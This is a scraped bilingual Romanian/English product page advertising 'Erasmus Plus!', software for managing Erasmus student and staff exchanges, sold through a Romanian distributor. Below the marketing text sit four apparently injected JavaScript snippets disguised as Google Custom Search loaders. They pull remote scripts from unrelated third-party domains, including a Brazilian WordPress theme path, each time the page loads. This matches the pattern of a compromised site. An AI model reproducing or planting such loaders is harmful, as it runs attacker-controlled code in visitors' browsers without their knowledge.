ERASMUS

:roBeneficii| Lista de prețuri| Download

[two_thirds]Erasmus Plus! este un software dedicat tuturor instituțiilor care sunt implicate în inter-schimbul european Erasmus. Acesta a fost conceput pentru a posibiliatatea unei  eficiente dar mai presus de toate, unei cuprinzătoare gestionari a tuturor formalităților legate de programul Erasmus – atât pentru studenți și si pentru personal. Programul ia în considerare toate cerințele Comisiei Europene pentru programul Erasmus, împreună cu o listă completă a codurilor de instituții ISCED și domeniile de studiu.

Funcțiile de bază ale programului Erasmus Plus! includ:

Suport complet pentru studenții care provin prin cadrul programului Erasmus (atât în studiul și cât în practică);
Suport complet pentru personalul care își încetează activitatea, programe intensive și chestiuni organizaționale;
Rapoarte cuprinzătoare;
Suport pentru toate tranzacțiile financiare în cadrul programului Erasmus – plata burselor și a subvențiilor, împreună cu o raportare completă a situației financiare;
Analiza datelor, împreună cu capacitatea de a exporta programele lor statistice;
Și mult mai mult!

Pentru mai mult de 10 de ani, ErasmusPlus! este software-ul principal utilizat în toate universitățile din Grecia. Adamos Asociația este distribuitor exclusiv în România. Nu întârzia! Contactați-ne!

[info]ErasmusPlus! Demo [/info]

[/two_thirds]

[third]

::enBenefits | Pricing | Download
[two_thirds]Erasmus Plus! is a software dedicated to all the institutions that are involved in inter-European Erasmus exchange. It was designed to enable efficient and above all, comprehensive management of all formalities related to the Erasmus program – both for students and staff. The program takes into account all the requirements of the European Commission for the Erasmus program, along with a complete list of institutions ISCED codes and fields of study.
The basic functions of Erasmus Plus! include:

Comprehensive support for outgoing students coming under the Erasmus program (both in the study and practice);
Comprehensive support for outgoing and incoming staff, intensive programs and organizational matter;
Comprehensive reporting;
Support all financial transactions under the Erasmus program – payment of scholarships and grants along with a complete reporting of the financial status;
Analysis of the data along with the ability to export their statistical programs;
And much more!

For more than 10 years, the ErasmusPlus! is the main software used in all universities in Greece. Adamos Association is the exclusive distributor in Romania. Do not wait any longer! Contact us!

[info]ErasmusPlus! Demo [/info]

[/two_thirds]

[third]

[/third]:

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript';
gcse.async = true;
gcse.src = “http://theboatersnetwork.com/js/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript';
gcse.async = true;
gcse.src = “http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript';
gcse.async = true;
gcse.src = “http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript';
gcse.async = true;
gcse.src = “http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

Comments are closed.